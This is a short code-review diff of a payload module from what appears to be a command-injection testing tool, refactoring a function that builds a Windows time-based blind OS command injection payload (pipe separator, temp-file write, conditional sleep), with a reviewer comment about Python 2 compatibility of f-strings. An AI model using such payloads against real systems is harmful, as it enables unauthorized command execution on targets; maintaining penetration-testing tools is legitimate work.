src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py

```diff
@@ -96,16 +96,14 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method):
 """
 def decision_alter_shell(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method):
   if settings.TARGET_OS == settings.OS.WINDOWS:
-    python_payload = settings.WIN_PYTHON_INTERPRETER + " -c \"with open(r'" + OUTPUT_TEXTFILE + "') as file: print(len(file.read().strip()))\""
-    if separator == "|" or separator == "||" :
-      pipe = "|"
-      payload = (pipe +
-                settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.SINGLE_WHITESPACE + "'" + TAG + "'" + pipe +
-                "for /f \"tokens=*\" %i in ('cmd /c " +
-                python_payload +
-                "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE +
-                "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
-                )
+    python_payload = f'{settings.WIN_PYTHON_INTERPRETER} -c "with open(r\'{OUTPUT_TEXTFILE}\') as file: print(len(file.read().strip()))"'
+    if separator in ("|", "||"):
+      payload = (
+        f'| {settings.WIN_FILE_WRITE_OPERATOR}{OUTPUT_TEXTFILE} "{TAG}" | '
+        f'for /f "tokens=*" %i in (\'cmd /c {python_payload}\') do '
+        f'if %i=={j} cmd /c {settings.WIN_PYTHON_INTERPRETER} '
+        f'-c "import time; time.sleep({2 * timesec + 1})"'
+      )
```

Comment:
For Python `2.x` and `3.x` compatibility, avoid` f-strings` (they’re Python `3.6+` only)